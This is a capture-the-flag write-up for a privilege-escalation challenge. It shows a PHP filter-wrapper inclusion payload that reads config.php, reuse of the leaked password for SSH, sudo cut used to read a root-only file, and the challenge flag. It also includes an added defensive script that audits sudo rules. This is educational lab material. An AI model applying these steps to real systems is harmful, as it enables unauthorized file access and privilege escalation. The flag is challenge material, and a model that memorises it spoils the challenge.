AUCHALL - [Privesc] - Intro Privesc
Challenge Description
Based on the credentials you got from Intro, it's time you escalate your privileges.
Solution
Running the following payload in the Intro Web challenge gave us the credentials:
php://filter/convert.base64-encode/resource=config.php
Decoding the base64 output gave us the database credentials:
<?php
$host = "127.0.0.1";
$user = "the_user";
$pass = "%as21k.amu2SAVS51";
$db = "cy243l";
/*
In a recent scan, I found out that the db user and the machine user had exact same usernames and passwords.
Do ping me once you've changed it.
*/
?>
Credentials
Username: the_user
Password: %as21k.amu2SAVS51
Log in over SSH using those credentials:
ssh [email protected] -p PORT
The first thing to do is run sudo -l.
We can run /usr/bin/cut as sudo.
Go to GTFOBins and look up cut; its sudo entry reads a file:
$ LFILE=/root/flag.txt
$ sudo cut -d "" -f1 "$LFILE"
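The same finding from the defender's side, as an added example that is not part of the original writeup: a small audit of `sudo -l` output that flags file-reading utilities granted without argument restrictions, which is what made /usr/bin/cut usable here. The sample output, the host name `box` and the `FILE_READERS` list are constructed for illustration; only the /usr/bin/cut entry comes from this page.

```python
import re

# Constructed subset of utilities that can print arbitrary file contents.
FILE_READERS = {"cut", "cat", "head", "tail", "less", "more", "awk", "sed"}

# Constructed `sudo -l` output; only /usr/bin/cut is taken from the writeup.
SAMPLE = """\
User the_user may run the following commands on box:
    (root) NOPASSWD: /usr/bin/cut
    (root) /usr/bin/systemctl restart nginx, /usr/bin/tail /var/log/app/*.log
    (root) /usr/bin/head -n 20 /var/log/app/current.log
"""

# One entry line: "(runas) [TAG: ...] cmd[, cmd ...]"
ENTRY = re.compile(
    r"^\s+\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)


def audit(sudo_l_output):
    """Return (runas, path, reason) for each risky entry in `sudo -l` output."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue  # header or unrelated line
        # Commands are comma-separated; each starts with "/" or is "ALL".
        for cmd in re.split(r",\s*(?=/|ALL\b)", m["cmds"].strip()):
            path, _, args = cmd.partition(" ")
            name = path.rsplit("/", 1)[-1]
            if path == "ALL":
                reason = "any command allowed"
            elif name not in FILE_READERS:
                continue
            elif not args:
                # In sudoers, a command listed without arguments accepts any.
                reason = "no argument restriction: any file readable as run-as user"
            elif any(c in args for c in "*?["):
                reason = "wildcard in arguments can match unintended paths"
            else:
                continue  # fixed arguments, nothing to flag
            findings.append((m["runas"], path, reason))
    return findings


if __name__ == "__main__":
    for runas, path, reason in audit(SAMPLE):
        print(f"{path} as {runas}: {reason}")
```

Entries with fixed arguments, such as the constructed head line, are not flagged; the fix for a flagged entry is to remove it or pin its arguments to exact values in sudoers.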
Flag
Flag is dynamic
CY243L{sud0_-l_ftw_w1th_gtf0b1ns_EE3EC9f_6aUR_MPEy}
Writeups 2023 © RootxRAN.